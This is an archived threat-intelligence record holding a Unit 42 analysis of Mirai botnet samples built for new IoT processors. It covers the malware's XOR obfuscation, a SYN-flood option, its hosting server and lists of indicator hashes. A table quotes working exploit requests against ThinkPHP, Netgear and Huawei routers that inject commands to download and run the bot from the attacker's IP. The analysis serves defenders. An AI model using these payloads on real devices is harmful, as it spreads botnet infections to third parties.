{
	"id": "5ac56eec-f249-46d5-ac71-a5f1548ca8e1",
	"created_at": "2026-04-06T00:21:32.051789Z",
	"updated_at": "2026-04-10T13:11:22.870505Z",
	"deleted_at": null,
	"sha1_hash": "f47336ebb25980cd3d36973a0c25d3d408fff476",
	"title": "Mirai Compiled for New Processors Surfaces in the Wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 574814,
	"plain_text": "Mirai Compiled for New Processors Surfaces in the Wild\r\nBy Ruchna Nigam\r\nPublished: 2019-04-08 · Archived: 2026-04-05 16:14:12 UTC\r\nExecutive Summary\r\nIn late February 2019, Unit 42 discovered Mirai samples compiled for new processors/architectures not previously\r\nseen before. Despite the source code being publicly released In October of 2016, the malware has, until now, only\r\nbeen found targeting a fixed set of processors/architectures.\r\nUnit 42 has found the newly discovered samples are compiled for Altera Nios II, OpenRISC, Tensilica Xtensa,\r\nand Xilinx MicroBlaze processors. This is not the first time Mirai has been expanded for new processor\r\narchitectures, samples targeting ARC CPUs were discovered in January 2018. Yet this development shows that\r\nMirai developers continue to actively innovate, targeting a growing array of IoT devices. The malware gained\r\nnotoriety in 2016 for its use in massive denial of service attacks on Dyn and the website of security blogger Brian\r\nKrebs. If the latest innovations lead to an increase in the number of infected devices, that means that Mirai\r\nattackers would have access to additional firepower for use in denial of service attacks.\r\nIn this blog, we show the new features we’ve found in these new samples, discuss the infrastructure we observed,\r\nshow how other Mirai samples using known exploits were hosted on the same infrastructure as the new samples,\r\nand give indicators of compromise (IoCs) for these new samples.\r\nTo protect against Mirai and other threats, organizations should make securing their IoT devices with the latest\r\nupdates and non-default passwords a priority.\r\nNew Features in these New Samples\r\nIn addition to the being compiled for these new architectures, we have found that these new samples also contain\r\nthe following new features:\r\nEncryption algorithm: These samples make use of a modified version of the standard byte-wise XOR (as\r\nimplemented in the toggle_obf function) used in the original Mirai source code.\r\nIt uses 11 8-byte keys, all of which are cumulatively byte-wise XOR-ed to get the final resulting key. This is better\r\nillustrated in the code snippet below:\r\ntablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF,\r\n0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]\r\nxor_key = 0\r\nfor key in tablekeys:\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 1 of 9\n\nxor_key ^= key\u00260xff ^ (key\u003e\u003e8 \u0026 0xff) ^ (key\u003e\u003e16 \u0026 0xfF) ^ (key\u003e\u003e24 \u0026 0xff)\r\nThis is effectively the equivalent of a byte-wise XOR with 0x5A.\r\nattack_method_ovh: The samples include a DDoS attack option with the following parameters:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\nATK_OPT_IP_TOS = 0\r\nATK_OPT_IP_IDENT = 0xFFFF\r\nATK_OPT_IP_TTL = 64\r\nATK_OPT_IP_DF = 1\r\nATK_OPT_SPORT = 0xFFFF\r\nATK_OPT_DPORT = 0xFFFF\r\nATK_OPT_SEQRND = 0xFFFF\r\nATK_OPT_ACKRND = 0\r\nATK_OPT_URG = 0\r\nATK_OPT_ACK = 0\r\nATK_OPT_PSH = 0\r\nATK_OPT_RST = 0\r\nATK_OPT_SYN = 1\r\nATK_OPT_FIN = 0\r\nATK_OPT_SOURCE = LOCAL_ADDR\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 2 of 9\n\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\nThese are the exact same parameters as the attack method “TCP SYN” (attack_method_tcpsyn) in the original\r\nMirai source, so the reason behind incorporating a new attack method with the same parameters remains unclear.\r\nPivoting on this attack method in AutoFocus, we found samples circulating in the wild since November 2018 for\r\nother previously known architectures also employing it.\r\nInfrastructure\r\nWe found these latest samples on a single IP that at one point of time was hosting them via an open directory;\r\nhowever, on February 22, 2019, the server was later updated to hide the file listing but continued to host the files\r\nthemselves.\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 3 of 9\n\nFigure 1. Open directory hosting samples of the Mirai variant\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 4 of 9\n\nPrior to the update on February 22, the same IP was hosting Mirai samples containing the following exploits\r\nknown to be used in previous versions of Mirai. The presence of these exploits in both previous versions of Mirai\r\nand our newly discovered samples help show the tie between the two are likely used by the same attacker in this\r\ncase. These exploits are shown in Table 1, below.\r\nVulnerability Exploit Format\r\nThinkPHP\r\nRemote Code\r\nExecution\r\nGET /to/thinkphp5.1.29/?s=index/\r\nhinkContainer/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=\r\n'wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777\r\n/tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp' HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hito/2.0\r\nD-Link\r\nDSL2750B\r\nOS\r\nCommand\r\nInjection\r\nNetgear\r\nRemote Code\r\nExecution\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-\r\nrf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-\r\nr+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod\r\n777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear\u0026curpath=/\u0026currentsetting.htm=1\r\nHTTP/1.0\r\nCVE-2014-\r\n8361\r\n \r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 5 of 9\n\nCVE-2017-\r\n17215\r\nPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\",\r\nnonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\",\r\nresponse=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\",\r\nnc=00000001, cnonce=\"248d1a2560100669\"\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\ns:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:Upgrade\r\nxmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\r\n\u003cNewStatusURL\u003e$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r\r\n/wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary\r\nwget.selfrep.exploit.huawei)\u003c/NewStatusURL\u003e\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\r\n\u003c/NewDownloadURL\u003e\u003c/u:Upgrade\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nTable 1. Exploits in Mirai variant hosted at 178.62.227[.]13 prior to February 22\r\nConclusion\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 6 of 9\n\nGiven that the Mirai source code is open source, something as elementary as compiling the same source code for a\r\nlarger range of processors provides attackers with the advantage of a larger attack surface. Practically, this means\r\nthat the family can now infect and propagate via a larger number of embedded devices, affording attackers greater\r\nDDoS firepower.\r\nPalo Alto Networks customers are protected by:\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and\r\nPANDB.\r\nAutoFocus customers can track the exploits mentioned using the following tags:\r\nThinkPHP RCE\r\nDLinkDSL2750BOSCmdInjection\r\nNetgear RCE\r\nCVE-2014-8361\r\nCVE-2017-17215\r\nThe malware family can be tracked in AutoFocus using the tag ELFMirai\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nURLs\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazebe\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazeel\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hnios2\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hopenrisc\r\n178[.]62.227.13/wrgjwrgjwrg246356356356/hxtensa\r\nXilinx MicroBlaze Samples\r\n006b73c03760f168a5d71c0edd50e9a437aca7b3db1dbecac75ea2ef9e74f54f\r\n233790b3a74245c4660cadec23145246484154abd01edd45836c31598f96b13d\r\n26298ff73035ef2dc92cda118d476933d3014b39ac478865bd86d28aa5457459\r\n2d7ed9ccd1b94f58aff30f7a7d798dd03b6a0f5bed2a529e1e13d8d78e9ae289\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 7 of 9\n\n3891a82075bd173bb1e052c27f1be946559aaeb65e6a4c761ba8bbd2cbccd3fb\r\n43c5efda1875fd809f97b49d296f34e1292ed86e5a4197460764fe67b98294ef\r\n44f1d6144df90adea1b7b482c84946257c9fb70a9c195a6846f416de80b5e6fd\r\n4cb4c5cbf7eb646bdc08640f4f9e9a4383a9c7ac4e26be0caeb9dc904670c5bf\r\n4d8a4841a2f4a61ed6df2be79dd7ea1eb2052cee6eba4d8de30add7908ebb779\r\n537c2d136a805fe1b703709b0794e25f91f2136027287fa4817080330c7989ce\r\n683b6f8209725ae0e715cda5a1cd35bcaacb5d45ae8e487c98dce2c01c91c887\r\n9b1eab0283fd6948a9a181abaa2f6b3c26f2b0077c8a8b32e763790dd64d2a22\r\na736d6ebf9596872f3c92ac486be2588ccf0c53cf15a3897a97c83ca1525ff8d\r\na9dbcc2681d427f9820ca9c5ec120b9bf3e83c9856e89736884ee4dc26712e50\r\nbdd19fa8a7c0e3a5ebbb14d5885cb09a863122ad2c78f53361db0c194045d491\r\nc0f18a5113b341faacb9f647cee954a237925cc62d5daff559a8a880702273c1\r\nc75b3c52c0f5eebfd4c44c3069a393e824d455c7405d57ee99fd7613b8211b31\r\nd28d05477ddbb1e3de330e98a2cb199ed76df0d1c942c467c977c9b70771477a\r\nde6a0d2b8b4323bc06a6cd02b0042fc92c36319696dafafd057e905d359f60ea\r\ne740f780f2b91a41c5024115bbed607b0a75e52fcf4f96b86d0f8adda0c97ddf\r\nOpenRISC Samples\r\n09f8885872bc47e03608d6725f8735074c8b915ca08540e367921223058c108a\r\n199f1976cb5fb39a9c395a28e2178476b6eaec0f3499a5a11912f103dcd64d00\r\n1efdfc79d0c4b779966dfcae7d4f0a1f17f043e098ec0f90ff12a7ebc3c3f1f1\r\n24b4c838dd41c0d812f747e48cf24be4f2265bce8f1e4d0d8ca6a7fc5649019b\r\n59b7a7baf4c239786fdf5ceca9084d829c6f6fc0603a524df313b2ef4958e4c2\r\n6183c7c87ff7cc3721c000af73714be27884a22057c4dc69bccd34571353f327\r\n74a45ff17678e0bddf383b5229785dda04c515e778bc9421d9396168f1cf3c3d\r\n76c9e543a0386994031b4905533eccd05400b3bb12fefc94f1eb65af5debe986\r\nb6359a84bd36a3ce8a13f1306ad74d757c384a772691c228c9a00a5246d828fa\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 8 of 9\n\nb758405fd18c4518878868163472bcb4e988e4ecbc3312b9756d231b80646816\r\nb89196b9773c6c809a2547434ce3e9de8a494ed7b338e013fd3f2818b4b54fd1\r\nc33080bea85616fd1251f877cd9ff570dd6a2e2f24cc20254754cb2c74a2375e\r\nd21880f4f919c410d0f2ee447716a2f7288dbaa21ec7de8601f0fc999b4d3d45\r\nf646c45feb0ccab4caf61bdb4aa45b0295614b2e881ad9c594ccaec2ea886671\r\nTensilica Xtensa Samples\r\n006436f282f46f49eb97c2e119622ac61086a908623ca741eb29caeca22c797a\r\n28bb80c687cb0aeea0b2d53dd5bf34f21f7292e5708b0aefeea25aebe2ff93af\r\n5647168f9818dc40599d057c426424709bde5722c62088ecff64b97d3acfc4a7\r\n57cc6875ae0c571ef1edaae72d82b0da6e60331ad4b3ad34c922b9e4612b8779\r\n61893583675935ac7a4857542f13d513ffbb176b302a72d26d7ec39fd931decb\r\nac4a00bfe1031e19eb9a101d61ef5267627ebaeb2aca4b962c7bb1b5a59e337c\r\nb0cef399ea8ec2244aebb3506a2bb60c64c3921e816c0fc9752caf84c6cf196d\r\nb5da0b6070d9cf3a3d628864e0f0860c8fc967ce692c0142f5a6dafee64079f6\r\nAltera Nios II Samples\r\n0c35f2902d92ef4f46e4643d11c46bde57027bb14e2b75c027a50fe7efc4f358\r\n3446c2ed11a6a5e02702afd5f7082eb435b2922096443cabd45d54b5b7582cc1\r\n48c760ba6b6a29e2a90bdb88bf96486c158f2b47ee9e1c560a47071e39bb5e87\r\n5876c9ac609ece0e051c57b380489490bc78e40c796b637af1e80adbdb9f70dc\r\na457090fb6df8cb93c91ec6b5d89927f7a6f9e247389d945d44731351a367b4e\r\ned5e313821bf3a20d226c1b5f2b0ba7f1897d0778c27620017b852579e3e1894\r\nfae498477388c53c8c623fd8ddb710cc286584200767907b104d55f916d37c05\r\nSource: https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nhttps://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/"
	],
	"report_names": [
		"mirai-compiled-for-new-processor-surfaces"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434892,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.pdf",
		"text": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.txt",
		"img": "https://archive.orkl.eu/f47336ebb25980cd3d36973a0c25d3d408fff476.jpg"
	}
}